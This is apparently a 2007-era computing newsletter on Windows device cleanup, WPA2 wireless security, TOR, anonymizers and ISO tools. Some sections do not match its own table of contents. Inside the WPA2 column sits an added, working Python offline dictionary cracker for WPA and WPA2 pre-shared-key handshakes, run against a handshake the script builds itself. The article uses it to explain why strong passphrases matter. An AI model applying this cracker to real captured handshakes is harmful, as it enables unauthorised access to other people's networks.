How to prevent and remove ‘phantom’ devices
In this issue
- TOP STORY: How to prevent and remove 'phantom' devices
- WACKY WEB WEEK: Download gets a whole new meaning
- LANGALIST PLUS: Securing your wireless network with WPA2
- PERIMETER SCAN: Don't rule out third-party security patches
- PATCH WATCH: Patch animated cursors, don't install 2003 SP2
How to prevent and remove 'phantom' devices
By Fred Langa
A little ghostbusting is all it takes to free your system of nonexistent devices. Windows sometimes displays USB drives and other removable devices that are no longer connected to your system. Here’s how to cure the problem and prevent it from happening again.
Keep phantom devices at bay
Have you ever had Windows show you a device — perhaps a USB drive or other removable device — that’s no longer connected to your system? When this happens, you can run into trouble if software tries to access the phantom device.
Or, because the nonexistent device is still consuming a drive letter assignment and/or other resources, you may have problems when you add additional devices that need the already-assigned resources. I’ve seen some cases where people were running out of drive letters because their systems were maintaining a whole flock of phantom drives!
Let’s begin with ways to prevent the phantom devices from appearing in the first place. Then, we’ll come back to removing any that may already be there.
Phantom devices can appear for any number of reasons. Perhaps the most common reason is a shutdown error with a removable drive. Most people don’t know this, but there are actually three different ways to disconnect a removable drive. Two are correct, and one isn’t.
Here’s the official word from Microsoft on the two correct ways of removing an external or hot-swappable disk (or other device), as described in the Windows XP Professional Resource Kit:
- “If the Safely Remove Hardware icon appears in the taskbar notification area, you must use [it]. If the Safely Remove Hardware icon is not in the notification area, you must use Device Manager to uninstall the disk before you unplug it.”
The third, improper method is the one almost all of us use: We simply unplug the device. In fact, this usually works, as long as the device isn’t actively being written to or read from. You unplug the device, hear the audible "device unplugged" confirmation tones (a descending "ding-dong"), and that’s that.
But note Microsoft’s use of the word "must" in the above quote: You must use the Safely Remove Hardware method — if it’s available. It’s not a mere suggestion or recommendation. Microsoft says it’s a must.
That’s because simply unplugging a device (the way most of us do) runs the risk of losing data through a delayed write, or open file, or similar problem. You also risk leaving behind a phantom drive or other resource assignment, because the OS doesn’t realize the device is gone.
You can avoid these problems by using either the Safely Remove Hardware method or the Device Manager method. They ensure that all writes or other pending operations are completed, that any open files are closed, and that the OS knows it can free up whatever resource assignments the device was using.
To put it another way, go ahead and simply unplug your removable devices if you wish. Most times, it’ll work perfectly fine. But if it doesn’t and you end up with phantom drives or other problems, you’ll know why!
Of course, there are still some pitfalls you need to watch out for — after all, this is Windows we’re talking about, and nothing is quite as simple as we might wish. Plus, there remains the question of what to do if your system is already carrying a flock of phantom drives. I’ll cover that in the items below.
Restoring the HotPlug Manager
OK, so now we know that we’re supposed to use the Safely Remove Hardware method to disconnect removable devices. But what happens if the Safely Remove Hardware icon goes AWOL on you? Or, what if you click it, but it doesn’t do anything? And what if you already have phantom drives on your system? How do you get rid of them?
The Safely Remove Hardware icon is actually a shortcut to Windows’ HotPlug Manager. This service normally launches automatically when you connect a recognized USB or Firewire device to your system.
Figure 1. The HotPlug Manager can be accessed via the Safely Remove Hardware icon, which normally appears in the Notification Area by the clock.
But, as with all software, things sometimes go awry. The HotPlug Manager occasionally hangs or fails to launch, meaning that the Safely Remove Hardware icon won’t appear, even when you know it should. In this case, the simple fix is to manually launch the HotPlug Manager by opening the Start, Run dialog and typing the following:
RunDll32.exe shell32.dll,Control_RunDLL HotPlug.dll
Click OK, and the HotPlug Manager’s Safely Remove Hardware icon should appear. Its dialog box should open and display any connected devices. That’s all it takes!
If only it were so simple. Unfortunately, not all devices cooperate with the HotPlug Manager. If you connect an unrecognized device to your system and the Safely Remove Hardware icon doesn’t appear — and manually launching the HotPlug Manager doesn’t help — it may be that the device simply won’t work with the HotPlug Manager. (It’s not very common, but it happens.)
To safely remove such an unrecognized device, you’ll have to use Device Manager to uninstall the device prior to disconnecting. (One way to access Device Manager is via Control Panel, Performance & Maintenance, System, Hardware, Device Manager.)
You may sometimes encounter a separate problem, too: The Safely Remove Hardware icon may be present, but won’t do anything when you click it. This problem doesn’t affect many systems, but if it affects yours, Microsoft has a hotfix for you — KB 883517.
The techniques above will help you properly shut down and remove devices from your system and should keep phantom devices from populating your system in the future. But, if you already have such phantoms in your PC, here’s the quick-and-dirty method I use when I have to clean up any kind of ghost device in my system, or when a known-good device’s settings become hopelessly bollixed:
Open Device Manager and uninstall not only the offending device itself, but also (if possible) any device that directly controls the offending device. Note that Device Manager normally hides devices that aren’t currently present, which is exactly what a phantom is. To make them visible, open a Command Prompt window, type set devmgr_show_nonpresent_devices=1, then start devmgmt.msc from that same window and choose View, Show hidden devices. On reboot, Windows will rediscover and reinstall the hardware, freshly reconfiguring the devices that are present and ridding the system of ghost devices.
For example, if I’m having a problem with disk drives, I may uninstall the drives and the drive controllers in Device Manager. On reboot, Windows will rediscover the controllers first, and then set up the drives afresh.
Or, if I’m having a USB problem, I’ll uninstall the USB Root Hubs and Controllers in Device Manager. On reboot, Windows will sort things out from scratch, leaving behind a freshly-configured, phantom-free setup.
This brute-force approach surely isn’t elegant, but it’s fast and it works. And, if you have current and complete backups, there’s essentially no risk to it.
Free virtual CD-ROM drive from Microsoft
I recently rediscovered a nifty free tool from Microsoft. You may find it useful, too.
It’s the Microsoft Virtual CD-ROM Control Panel. The download is a self-extracting archive that contains three files: the front end (VCdControlTool.exe), the virtual CD driver (VCdRom.sys), and a readme file. The latter contains the basic instructions for using the tool.
To understand how it works, you need to know about ISO files — a kind of disk image of a standard CD. Many large downloadable software packages (including most Linux distributions) are packaged as ISO files. These files contain not only the data that’s on the original CD, but also information about how the CD is structured and formatted.
An ISO file is a sector-by-sector image of the disc, so it has to be handled by software that understands the format rather than simply copied onto a blank CD as one big file. Burning software uses the layout information in the image to write an exact duplicate of the original CD. Most normal CD-burning tools have a built-in way to do this. In Roxio’s Creator Classic, for example, it’s under the Record Disc From Image option on the File menu.
But sometimes, you don’t want the entire contents of a CD. You may instead just want to extract one file from the ISO image. Or, perhaps you’d like to test-drive software before committing it to a physical CD. Or, you may be in a situation (such as with a laptop computer) where you only have one CD drive but would like to be able to access two or more CDs simultaneously. Or, maybe you’re bogged down by having to process large amounts of data from a relatively slow CD, and you’d much prefer to access the data at hard-drive speeds.
That’s where the Virtual CD-ROM Control Panel comes in. It lets you mount an ISO file of a CD in one step, without having to burn it to an actual, physical CD first. You then have access to the full contents of the CD and can get at any or all of the data.
The Virtual CD-ROM Control Panel also lets you mount several images at once, each with its own drive letter. I don’t know what the upper limit is, but I’ve had as many as four ISOs mounted at once, in addition to the two real CD drives in my system. And, of course, because the ISO files actually reside on your hard drive, you can access them at normal hard-drive speeds, which are usually much, much faster than CD drives.
There are other, similar tools out there, but this one’s free, and works well. Very, very handy!
Another free tool — TCP/IP optimizer
Reader Wendell Britnell pointed out a nice addition to the information already presented in “Optimizing Your Network Connections” in the Mar. 15 issue. He visited Speedguide.net and was very impressed by its TCP/IP Analyzer and TCP/IP Optimizer.
For years, SpeedGuide.net lagged behind BroadbandReports.com. It seemed to remain focused primarily on dialup, even when cable, DSL, and other fast connections were becoming commonplace. After a while, I let the site fall off my radar.
But Wendell is right: Their current tools are up to date and very nice. What’s more, they’re even more automated than BroadbandReports.com’s. If you’re looking to get the most out of your online connections, Speedguide is back in business!
Thanks, Wendell!
Fred Langa edited the LangaList e-mail newsletter from 1997 to 2006, when it merged with Windows Secrets. Prior to that, he was editor of Byte Magazine and editorial director of CMP Media, overseeing Windows Magazine and others.
Download gets a whole new meaning
If you think bathroom humor is limited to juveniles and mass media, think again. Just in time for April Fools’ Day comes Google’s announcement of TiSP — the Toilet Internet Service Provider. The gag service claims to offer free, ultra-high speed connectivity for your wireless-capable PC. The only catch is that you have to connect to their system via cables you run through your toilet and local sewers.
The Google TiSP pages include a press release (touting the trademarked GFlush system), an installation guide ("wash your hands before surfing"), and a FAQ page (explaining how DNA analysis of your, er, "personal output" helps Google send you highly targeted advertising).
Securing your wireless network with WPA2
By Mark Joseph Edwards
Encryption isn’t any good if it can be easily cracked. You need to use the best encryption available, which currently means using WPA2. This week, I explain WPA2 and why you should take a layered approach to security.
WPA2 secures wireless better than WEP or WPA
In the Mar. 8 newsletter, I talked about securing wireless routers. One of the suggestions I made was to enable encryption, if your router and wireless network cards support that feature. Doing so helps prevent someone from snooping in your network traffic and using your bandwidth.
There are three basic types of encryption for most wireless networks: Wired Equivalent Privacy (WEP), Wi-Fi Protected Access (WPA), and Wi-Fi Protected Access 2 (WPA2). When considering encryption, the basic thing you need to know is that encryption is accomplished using some type of cipher and some length of encryption key to scramble and unscramble the data.
WEP and WPA both use the RC4 stream cipher. WEP uses a 40-bit encryption key (many products also offer 104-bit keys), while WPA uses a 128-bit key. Key length is not WEP’s real problem, though: its 24-bit initialization vector repeats quickly and its key scheduling has well-known weaknesses, so an attacker who captures enough traffic can recover the key whatever its length. WPA’s TKIP wraps RC4 with per-packet keys and a message integrity check, which closes those holes. WPA also uses dynamic keys, whereas WEP keys are static. Dynamic keys change at an interval, which adds to the strength of WPA protection by making your keys a moving target.
WPA can also support 802.1X authentication. In very simplified terms, this is a logon mechanism that verifies who the user is. Without 802.1X in place, WPA isn’t as strong as it could be. In fact, some experts argue that without 802.1X, WPA isn’t much better than WEP.
For more information about weaknesses in WPA without 802.1X, see Joel Snyder and Rodney Thayer’s 2004 article in Network Computing entitled, “WPA — An accident waiting to happen.”
Be aware that one popular tool for Mac OS X, called kismac, has the ability to discover encryption keys for both WEP and WPA. Other tools, such as WPA Cracker and CoWPatty, can do the same thing.
By contrast, WPA2 uses dynamic encryption keys and the Advanced Encryption Standard (AES) block cipher, in the mode known as CCMP. This is far stronger than the RC4 cipher used in WEP and WPA. To date, no one has published a way to defeat WPA2 encryption itself, although that does not mean it isn’t possible. In fact, several people have theorized ways that WPA2 could be defeated — it simply hasn’t been demonstrated yet. One caveat applies to the home-style setup with a pre-shared key: WPA2 derives its keys from the passphrase and runs its four-way handshake exactly as WPA does, so a short or dictionary-word passphrase can be guessed offline from a single captured handshake no matter which cipher is in use. Choose a long, random passphrase.
So, if you require encryption between your computer and wireless router, and your network hardware and operating system support WPA2, be sure to use it. If you can’t use WPA2, then use WPA; and if you can’t use WPA, then use WEP. Just be aware that WEP can be cracked in minutes from captured traffic, and that WPA or WPA2 with a weak pre-shared passphrase falls to a dictionary attack. Doing so does require specialized software that the average person won’t bother locating and using. On the other hand, determined intruders will obtain such software and try to use it.
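As an added illustration, and not part of this column or of any of the tools named above, here is the passphrase-to-key path that coWPAtty-style tools attack, written in Python. The MAC addresses, nonces and the "captured" handshake frame are constructed inside the code rather than sniffed, and the SSID, passphrase and wordlist are made up; the derivations themselves (PBKDF2 with the SSID as salt, the 802.11i key-expansion function, and the HMAC-MD5 versus HMAC-SHA1 handshake MIC) are the standard ones.

```python
import hashlib
import hmac

# Byte offset of the 16-byte MIC inside an EAPOL-Key frame:
# 4 (802.1X header) + 1 descriptor type + 2 key info + 2 key length + 8 replay counter
# + 32 nonce + 16 IV + 8 RSC + 8 key ID = 81
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    The SSID is the salt, so a precomputed table only helps against that one network name."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512: expand the PMK plus both MACs and both nonces into the 64-byte PTK.
    Bytes 0..15 are the KCK, the key that authenticates the handshake messages."""
    b = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + b + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def mic_over_frame(kck: bytes, frame: bytes, wpa2: bool) -> bytes:
    """MIC of an EAPOL-Key frame computed with its own MIC field zeroed.
    WPA (TKIP) uses HMAC-MD5; WPA2 (CCMP) uses HMAC-SHA1 truncated to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1 if wpa2 else hashlib.md5).digest()[:16]


def simulate_capture(passphrase: str, ssid: str, wpa2: bool) -> dict:
    """Constructed stand-in for message 2 of a sniffed four-way handshake (fixed MACs and
    nonces so the run is repeatable). A real attacker reads these fields from a packet capture."""
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    frame = bytearray(99)
    frame[0:4] = b"\x01\x03\x00\x5f"   # 802.1X: version 1, type EAPOL-Key, body length 95
    frame[4] = 2 if wpa2 else 254      # descriptor type: RSN (WPA2) or WPA
    frame[5:7] = b"\x01\x0a"           # key info: MIC present, pairwise key, message 2
    frame[17:49] = snonce              # the client's nonce travels in the clear
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    frame[MIC_OFFSET:MIC_OFFSET + 16] = mic_over_frame(kck, bytes(frame), wpa2)
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "frame": bytes(frame), "wpa2": wpa2}


def crack(capture: dict, wordlist):
    """Offline dictionary attack: derive PMK -> PTK -> KCK for each candidate and compare the
    MIC. Nothing is sent to the network; the captured handshake and the SSID are all it needs."""
    expected = capture["frame"][MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        kck = ptk_from_pmk(pmk, capture["ap_mac"], capture["sta_mac"],
                           capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(mic_over_frame(kck, capture["frame"], capture["wpa2"]), expected):
            return candidate
    return None


if __name__ == "__main__":
    wordlist = ["password", "12345678", "letmein", "correct horse", "linksys"]  # made up
    for wpa2 in (False, True):
        cap = simulate_capture("correct horse", "HomeNet", wpa2)
        print("WPA2" if wpa2 else "WPA", "->", crack(cap, wordlist))
```

Both the WPA and the WPA2 capture give up the same passphrase to the same short wordlist; the cipher makes no difference because each guess is checked against the handshake MIC, not against any encrypted data. The only defense in this path is the 4096 PBKDF2 rounds salted with the SSID, which slow the attacker down but do not help if the passphrase is in a wordlist.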
Keep in mind that network security essentially means controlling access. Therefore anything you do to control access is part of your security procedures.
Good network security requires a layered approach. The reason is simple and somewhat obvious: If one layer fails, then another layer can help protect your systems and network. For example, if someone found a way to crack your WPA2, then you would already have other layers in place that would help protect your network — if only for a little while longer.
There are some additional steps you can take to help protect your wireless network that will make it more difficult for a bad guy to break in. The extra time it takes to crack your system might be just enough for you to power off your network gear because you’re going to bed for the evening. A coincidence, yes, but you never know!
You can configure your router so that it doesn’t broadcast its Service Set Identifier (SSID), which is basically the router’s common name. While taking this step doesn’t completely eliminate a person’s ability to find your router’s name (that, too, can be done with special software), it will stop the average passerby from finding it.
Yet another step you can take is to configure the router so that it only accepts connections from specific Media Access Control (MAC) addresses, which are unique hardware numbers assigned to network interfaces. As with disabling SSID broadcasts, taking this step doesn’t completely prevent someone from connecting to your router. With enough knowledge and the right tools, someone could clone a MAC address that is allowed to connect to your router. But again, the average user who is merely looking for a quick way to check e-mail or view a Web page won’t bother with that. They’ll simply move on to find another nearby wireless network.
So, while both of these precautionary steps can be defeated by a savvy intruder, they will still go a long way towards keeping most, if not all, of your neighbors and strangers from connecting to your network without your permission.
And finally, one more step you can take to protect your wireless network is to simply turn it off when you aren’t using it! There’s no sense in leaving it on when it’s not in use, especially at night when you’re sleeping.
Thanks go out to John Landais for reminding me about the SSID features and MAC filtering.
Anonymizing your IP address for Web browsing
For various reasons, people sometimes want to anonymize their IP address so that Web sites can’t determine the real IP address of the person visiting the site. This can be accomplished in a variety of ways with a variety of tools.
What you need to know about anonymizing tools before choosing one is what types there are and how they work. With that information, you can easily find several different tools that meet your needs and then make an informed decision about which one to use.
There are two basic types of tools available: standalone proxy servers and Web-based anonymizing services. A Web-based anonymizing server is a Web application that you access like any other Web page. At the application’s host site, you enter into a form the URL of the site you want to access. When you click the submit button, the Web application retrieves the content and returns it to your Web browser.
Standalone proxy servers are very different from Web-based anonymizing servers. Standalone proxies typically don’t provide a Web-based form where you enter URLs. Instead, you configure your Web browser’s connection properties to point to the proxy server. Your browser then sends all of its traffic through the proxy, regardless of what Web site you’re visiting.
Most standalone proxy servers are run by relatively unknown third parties, such as businesses, universities, or private individuals. I strongly recommend that you stay completely away from unknown standalone proxy servers for two essential reasons. The first reason is that it might be entirely illegal to use the proxy server without the owner’s express permission. The second reason is that any proxy server operator can look in on your Internet use. If you don’t trust the proxy server operator, then you shouldn’t use the server when transmitting private information over the Internet.
If you must use some sort of proxy server, consider using a reasonably reputable Web-based anonymizing service. The only commercial Web-based service I know well is Anonymizer. Certainly there are other Web-based proxy services available, but Anonymizer is a legitimate business, and they maintain a good reputation, as far as I can tell.
I looked for a major publication that had published a review of anonymous proxy services and couldn’t find one. If you know of any, please send me an e-mail with the name of the publication and/or a link to the review. You can find my e-mail address at my Web site in the About section.
Thanks to Gene Goldenfeld for bringing up this topic via reader feedback.
Read the next item to learn about a slightly different type of proxy server network that you might consider using.
The Onion Router — a different type of proxy
In the Aug. 10 newsletter, Woody Leonhard wrote about The Onion Router (TOR). TOR is a network of proxy servers — think of them as layers — through which your network traffic passes before reaching its destination. Thus the use of the term “onion” to describe and name the tool.
Understanding how TOR works from a networking standpoint isn’t very difficult. Thousands of people around the world load the TOR software onto their computers and join the overall TOR network as relay servers or TOR endpoints. The TOR server software talks to centralized master TOR servers that keep track of all the IP addresses of all the TOR servers in the network.
After you load TOR software onto your computer and configure it to work as a TOR client, your computer will contact the master TOR servers to download a directory of both TOR relay servers and TOR endpoint servers. Your TOR client then uses that database to build a semi-random path through the TOR network, or a list of servers that your traffic will pass through before reaching its intended destination.
When you configure your Web browser’s proxy settings to use the TOR network, your client wraps each piece of traffic in one layer of encryption per server on the path (the innermost layer for the last server) and sends it to the first TOR server. That server strips its layer, learns only which server comes next, and passes the traffic to the second TOR server, which strips its own layer and sends the traffic on to the third. This continues until the traffic reaches a TOR endpoint server, which removes the last layer and sends the plain traffic to its real destination.
The purpose of that sort of routing is to randomize the path that your data travels, and to obscure the source of the data traveling over the TOR network. The technique works pretty well, but it’s not flawless. I’ll discuss this in a moment.
You can learn how to install TOR on your Windows platform by visiting the TOR page at the Electronic Frontier Foundation (EFF). For a quick overview of the history of TOR, be sure to read Woody’s article. You can also read his story about the Java Anonymous Proxy project in that same issue.
There’s one thing you need to keep in mind about TOR: At the time Woody wrote his article, it was believed that there wasn’t any way for people to figure out your real IP address when you’re using the TOR network. That is no longer the case. It is entirely possible to find your real IP address, although the process of doing so isn’t very simple and it does require a bit of specialized knowledge.
The basic technique centers around the fact that even though your browser is configured to use a proxy server, some of the plug-ins or extensions that you might have added to your browser completely ignore those proxy settings and directly connect to sites on the Internet if they can. Therefore, someone could take advantage of that loophole to cause your system to reveal its IP address to the operator of a Web site that uses software designed to unmask proxy-service users.
The other thing to keep in mind about TOR is that since endpoint servers must remove the last layer of encryption, the operator can see what you’re sending and receiving, unless the connection is itself encrypted end to end (an HTTPS site, for example), in which case the endpoint sees only which site you are talking to.
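An added simulation of the layering described above, written in Python; it is example code, not from Woody’s article or from the TOR project. Three relays share made-up keys with the client, a SHAKE-128 keystream stands in for the AES counter-mode cipher TOR actually uses, and there is no circuit-building handshake and no encryption between relays. What it does show is exactly what each hop can and cannot learn from the cell it handles.

```python
import hashlib

DELIVER = 255   # "next hop" marker meaning: you are the exit, deliver this to the destination
CLIENT = 0      # hop id used for the originating client


def keystream(key: bytes, counter: int, n: int) -> bytes:
    # SHAKE-128 used as a per-hop, per-cell stream cipher. Real TOR uses AES in counter mode
    # with keys negotiated by a handshake when the circuit is built; this is for illustration.
    return hashlib.shake_128(key + counter.to_bytes(4, "big")).digest(n)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class Relay:
    def __init__(self, rid: int, key: bytes):
        self.rid, self.key = rid, key
        self.seen = []        # (previous hop, next hop): everything a relay learns about the path
        self.received = []    # the cells exactly as they arrived, to check what is readable here

    def handle(self, counter: int, cell: bytes, network: dict, prev_hop: int) -> dict:
        self.received.append(cell)
        inner = xor(cell, keystream(self.key, counter, len(cell)))   # peel exactly one layer
        next_hop, rest = inner[0], inner[1:]
        self.seen.append((prev_hop, next_hop))
        if next_hop == DELIVER:                                       # exit: plaintext is visible
            dest, payload = rest.split(b"|", 1)
            return {"exit": self.rid, "dest": dest, "payload": payload}
        return network[next_hop].handle(counter, rest, network, self.rid)


def build_onion(path: list, keys: dict, counter: int, dest: bytes, payload: bytes) -> bytes:
    """Client side: encrypt for the exit first, then add one layer per earlier hop, so the
    first relay's layer is outermost. Each layer carries only the id of the following hop."""
    cell = xor(bytes([DELIVER]) + dest + b"|" + payload,
               keystream(keys[path[-1]], counter, len(dest) + len(payload) + 2))
    for i in range(len(path) - 2, -1, -1):
        cell = bytes([path[i + 1]]) + cell
        cell = xor(cell, keystream(keys[path[i]], counter, len(cell)))
    return cell


def send_through_tor(dest: bytes, payload: bytes, counter: int = 1):
    """Run one cell through a three-hop circuit; returns what the exit delivered plus the relays."""
    keys = {1: b"key-of-relay-1", 2: b"key-of-relay-2", 3: b"key-of-relay-3"}  # assumed pre-shared
    network = {rid: Relay(rid, key) for rid, key in keys.items()}
    path = [1, 2, 3]
    onion = build_onion(path, keys, counter, dest, payload)
    return network[path[0]].handle(counter, onion, network, CLIENT), network


if __name__ == "__main__":
    delivered, relays = send_through_tor(b"example.com", b"GET /private-page")
    print("exit", delivered["exit"], "delivered", delivered["payload"], "to", delivered["dest"])
    for rid in (1, 2, 3):
        print("relay", rid, "learned", relays[rid].seen)
```

Relay 1 learns that the client sent something and that relay 2 is next; relay 2 learns only its neighbours; relay 3 is the only hop that sees the destination and the request, which is the exit-node exposure discussed above. Using a fresh counter for every cell keeps the keystream from repeating, which is the one thing a stream cipher must never do.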
The basic rule of thumb when it comes to any sort of anonymous Internet use is that your anonymity level is entirely relative — the more technical knowledge you have, the more anonymous you can become. The inverse is, of course, also true.
The dangers of Jikto running in your browser
JavaScript is a great feature found in every major Web browser available today. Essentially, JavaScript is a mini-programming language that lets Web developers create all sorts of nifty features for Web sites that wouldn’t be possible using only HTML.
For example, JavaScript can create navigating menus that work in a way similar to the menus you find in typical desktop applications. It can also be used to check the input of forms you might submit, preload content so that it loads more quickly later, make Web pages load content without having to reload an entire page, and the list goes on.
One of our readers, Davis Newman, brought to my attention a recent demonstration of JavaScript that can act in an insidious way. The script — called Jikto by Billy Hoffman, the security researcher who developed it — runs in the background while you’re visiting the Web site that hosts it, as described in an InfoWorld article. Using your bandwidth, the program scans other sites for vulnerabilities and sends any information it finds back to a centralized location. The technique started showing up on a few Web sites (the kind you don’t want to visit) earlier this week.
If you simply disable JavaScript in your browser to defend against Jikto-like exploits, the chances are high that you’ll come across important sites that simply don’t work right because they depend on JavaScript.
Instead, if you use Firefox, you can install the popular NoScript extension. This free add-on lets you allow respected sites to run JavaScript in your browser, while disabling it for other sites you happen to visit.
If you use Internet Explorer, unfortunately, there doesn’t seem to be a similar tool that lets you control scripts site by site. With IE, scripting is controlled per security zone: for the Internet zone it’s either disabled or enabled, or it prompts you every time a Web page includes a script, which can be several instances per page. If you choose to disable scripts in the Internet zone, you need to add to your Trusted Sites zone any sites you wish to allow to run JavaScript.
To adjust the script settings in IE, follow these steps:
Step 1. Select the Tools menu, then Internet Options;
Step 2. Select the Security tab;
Step 3. Select the Internet Zone;
Step 4. Click Custom Level;
Step 5. Scroll down to Scripting and find the Active Scripting section;
Step 6. Select either Disable, Enable, or Prompt, then close the dialog.
Turn your Webcam into a surveillance system
Got a Webcam? Many people do. They can be fun and very useful in a variety of situations. A few years ago, I read a news story about a man whose home was broken into. The thieves stole a lot of stuff, and he had a sneaking suspicion that it was some locals from the neighborhood who might come back. So, he set up a Webcam in his house to catch them if they returned and, sure enough, they did! He used the video to help the police arrest and convict them.
Other uses for a Webcam might be to post images to your Web site, monitor your babysitter, or check in on your home while you’re away.
When you buy a Webcam, sometimes it includes decent software that lets you record nearly unlimited amounts of images or video. The limit is typically how much disk space you have. In other cases, the disk-space limits are built into the software to encourage you to buy an upgrade to the software from the camera vendor.
If you don’t have software capable of motion sensing and want to try that feature, I know of a few packages you might want to look at.
One is Willing WebCam, which costs US$49.95 from Willing Software. The company also has a Lite version for $29.95 that has fewer features. Another package is Cam Wizard from LEDSET. That one costs $29.95. Yet another package — which seems to be very well-liked, based on my research — is Easy Web Cam, from MS Agent Software. That one is free, which probably explains why it’s so popular.
How to extract data from troublesome ISO files
At some point, you may come across files with an .iso extension. An .iso file is an archive that stores the entire contents of a CD-ROM in a single file. You then use a CD-burner application to recreate the CD so you can use it on your PC. The .iso extension name is derived from the industry-standard, ISO 9660 file system used by CD-ROMs.
One of our readers, Scott Irvine, ran across a problem with an ISO image recently, which I’ve encountered several times in the past. Basically, what happens is that sometimes when you burn a CD from an ISO image, the CD might not work in your PC.
If that happens, and you really want to use the contents of that CD, there’s a way around the problem: you can extract all the files onto your hard drive. Doing that, of course, requires a tool that can read the ISO image.
There are several programs available to do that job. One is MagicISO, which costs $29.95. Another that I know about is Undisker, which costs about $40. Yet another tool, which is completely free (you gotta love that), is called 7-Zip. It’s a Windows file archive-handling application that can work with a variety of formats, including RAR, CAB, ISO, ARJ, LZH, CHM, Z, CPIO, RPM, DEB, NSIS, 7z, ZIP, GZIP, BZIP2, and TAR files.
If you already have 7-Zip, make sure your version is 4.2x or later if you need support for .iso files.
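An added example, not part of Fred’s Virtual CD-ROM item above or of this item, and not code from 7-Zip, MagicISO or any other named product: a minimal ISO 9660 reader in Python that locates the primary volume descriptor, walks the root directory and pulls one file out of the image, which is all a tool has to do to extract data without burning a disc. The sample image is constructed in the code; its volume label, file name and contents are made up, and the reader handles only the root directory (no subdirectories, no Joliet or Rock Ridge extensions).

```python
import struct

SECTOR = 2048


def _u32(both_endian: bytes) -> int:
    # ISO 9660 stores multi-byte numbers twice, little-endian then big-endian; read the LE copy
    return struct.unpack("<I", both_endian[:4])[0]


def parse_dir_record(buf: bytes, off: int):
    """Decode one directory record at buf[off]; returns (record, offset of the next record)."""
    length = buf[off]
    if length < 33:
        raise ValueError("truncated directory record at offset %d" % off)
    rec = buf[off:off + length]
    name_len = rec[32]
    return {
        "extent": _u32(rec[2:10]),       # first sector of the file or directory data
        "size": _u32(rec[10:18]),        # data length in bytes
        "is_dir": bool(rec[25] & 0x02),  # file flags, bit 1 = directory
        "name": bytes(rec[33:33 + name_len]),
    }, off + length


def _extent_bytes(image: bytes, extent: int, size: int) -> bytes:
    start = extent * SECTOR
    if start + size > len(image):        # a malformed image must not send us past the end
        raise ValueError("extent %d (%d bytes) lies outside the image" % (extent, size))
    return image[start:start + size]


def read_pvd(image: bytes) -> dict:
    """The primary volume descriptor always sits in sector 16 and starts with 0x01 'CD001'."""
    pvd = image[16 * SECTOR:17 * SECTOR]
    if len(pvd) < SECTOR or pvd[0] != 1 or pvd[1:6] != b"CD001":
        raise ValueError("not an ISO 9660 image: no primary volume descriptor at sector 16")
    root, _ = parse_dir_record(pvd, 156)  # 34-byte record describing the root directory
    return {"volume_id": pvd[40:72].decode("ascii").rstrip(), "root": root}


def list_directory(image: bytes, directory: dict) -> list:
    """Walk the records in a directory extent, skipping the '.' and '..' entries."""
    data = _extent_bytes(image, directory["extent"], directory["size"])
    entries, off = [], 0
    while off < len(data):
        if data[off] == 0:                 # zero padding: records never straddle a sector
            off = (off // SECTOR + 1) * SECTOR
            continue
        rec, off = parse_dir_record(data, off)
        if rec["name"] not in (b"\x00", b"\x01"):
            entries.append(rec)
    return entries


def extract_file(image: bytes, name: str) -> bytes:
    """Return the contents of a root-directory file; the ';1' version suffix is ignored."""
    for rec in list_directory(image, read_pvd(image)["root"]):
        if not rec["is_dir"] and rec["name"].split(b";")[0] == name.encode():
            return _extent_bytes(image, rec["extent"], rec["size"])
    raise FileNotFoundError(name)


def _dir_record(name: bytes, extent: int, size: int, is_dir: bool) -> bytes:
    body = (b"\x00"                                        # extended attribute length
            + struct.pack("<I", extent) + struct.pack(">I", extent)
            + struct.pack("<I", size) + struct.pack(">I", size)
            + bytes(7)                                     # recording date, unused here
            + bytes([0x02 if is_dir else 0x00, 0, 0])      # flags, unit size, interleave gap
            + struct.pack("<H", 1) + struct.pack(">H", 1)  # volume sequence number
            + bytes([len(name)]) + name)
    if len(name) % 2 == 0:
        body += b"\x00"                                    # record length must be even
    return bytes([len(body) + 1]) + body


def build_sample_image() -> bytes:
    """Constructed image: 16 empty system sectors, PVD, terminator, root directory, one file."""
    payload = b"hello from inside the ISO\n"
    root_rec = _dir_record(b"\x00", 18, SECTOR, True)
    root_dir = (root_rec + _dir_record(b"\x01", 18, SECTOR, True)
                + _dir_record(b"README.TXT;1", 19, len(payload), False))
    pvd = bytearray(SECTOR)
    pvd[0], pvd[1:6], pvd[6] = 1, b"CD001", 1
    pvd[40:72] = b"SAMPLE".ljust(32)
    pvd[156:190] = root_rec
    term = bytearray(SECTOR)
    term[0], term[1:6], term[6] = 255, b"CD001", 1
    return (bytes(16 * SECTOR) + bytes(pvd) + bytes(term)
            + root_dir.ljust(SECTOR, b"\x00") + payload.ljust(SECTOR, b"\x00"))
```

The bounds check in _extent_bytes is the part worth copying: every extent and length in an ISO comes from the image itself, so a reader that trusts them blindly can be walked off the end of the file by a crafted or simply corrupt image, which is the failure Scott ran into from the other direction when a burned disc wouldn’t read.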
